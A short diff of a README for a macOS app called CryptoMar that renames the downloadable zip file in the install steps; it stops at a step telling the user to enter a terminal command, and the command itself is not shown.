HexaMar/CryptoMar_EN/README.md

 ### 🍎 For macOS

-1. Download the file `CryptoMar.zip`
+1. Download the file `CryptoMarAPP.zip`

-2. Open the file `CryptoMar.zip` in Download folder
+2. Open the file `CryptoMarAPP.zip` in Download folder

 3. Open the terminal, enter the following, and press Enter: